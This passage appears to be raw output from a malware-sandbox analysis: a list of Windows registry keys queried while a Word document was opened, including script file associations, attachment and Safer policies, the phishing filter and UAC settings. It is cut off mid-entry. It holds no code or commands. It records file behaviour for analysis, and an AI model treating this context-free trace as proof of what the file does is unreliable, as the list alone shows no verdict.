HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pif\(Default)
HKEY_CLASSES_ROOT\.pl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pl\(Default)
HKEY_CLASSES_ROOT\.prf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.prf\(Default)
HKEY_CLASSES_ROOT\.prg
HKEY_CLASSES_ROOT\.pst
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.pst\(Default)
HKEY_CLASSES_ROOT\.reg
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg\(Default)
HKEY_CLASSES_ROOT\.scf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.scf\(Default)
HKEY_CLASSES_ROOT\.scr
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.scr\(Default)
HKEY_CLASSES_ROOT\.sct
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.sct\(Default)
HKEY_CLASSES_ROOT\.shb
HKEY_CLASSES_ROOT\.shs
HKEY_CLASSES_ROOT\.tmp
HKEY_CLASSES_ROOT\.url
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\(Default)
HKEY_CLASSES_ROOT\.vb
HKEY_CLASSES_ROOT\.vbe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.VBE\(Default)
HKEY_CLASSES_ROOT\.vbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.vbs\(Default)
HKEY_CLASSES_ROOT\.vsmacros
HKEY_CLASSES_ROOT\.vss
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.vss\(Default)
HKEY_CLASSES_ROOT\.vst
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.vst\(Default)
HKEY_CLASSES_ROOT\.vsw
HKEY_CLASSES_ROOT\.ws
HKEY_CLASSES_ROOT\.wsc
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.wsc\(Default)
HKEY_CLASSES_ROOT\.wsf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.WSF\(Default)
HKEY_CLASSES_ROOT\.wsh
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.WSH\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\.doc
HKEY_CLASSES_ROOT\.doc\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.doc\OpenWithProgids
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\IsShortcut
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\ExecutableTypes
HKEY_CLASSES_ROOT\.com/tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\.com/tuzpq/file/cooujsc19a2cegnj6_tcmotog-266543746/
HKEY_CLASSES_ROOT\.com/tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.com/tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.com/tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/
HKEY_CLASSES_ROOT\Unknown
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Unknown\EditFlags
HKEY_CLASSES_ROOT\SystemFileAssociations\.com/tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/
HKEY_CLASSES_ROOT\*
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\EditFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\EditFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\System
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\FriendlyTypeName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOWNLOAD_PROMPT_META_CONTROL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DOWNLOAD_PROMPT_META_CONTROL
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\DefaultIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\DefaultIcon\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.doc\PerceivedType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\MS Shell Dlg
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\application/msword\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\application/msword
HKEY_CLASSES_ROOT\application/msword
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\DownloadUI
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\DownloadUI
HKEY_CURRENT_USER\Software\Classes\Interface\{0000000E-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0000000E-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0000000E-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NotifyDownloadComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV8
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\PhishingFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\PhishingFilter\EnabledV8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments\ScanWithAntiVirus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments\SaveZoneInformation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments\UseTrustedHandlers
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1807
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1807
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VirusScanner
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\VirusScanner
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoFileLifetimeExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoFileLifetimeExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\NoFileLifetimeExtension\.doc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\Open
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\Open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\Open\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Word.Document.8\shell\Open\command\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\CLSID\Implemented Categories\
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E119-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E132-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E169-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E170-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E174-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E178-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E17C-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E185-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E187-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0002E18B-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030000-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030001-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030002-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030003-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030004-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030005-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00030006-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000A-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000B-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000C-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000D-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003000E-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00031009-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0003100A-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00031018-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00041943-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00044851-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{000498C4-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00061068-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062000-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062001-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062002-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062003-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00062004-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067009-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0006729A-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067800-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067801-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067802-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067803-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067804-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067808-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-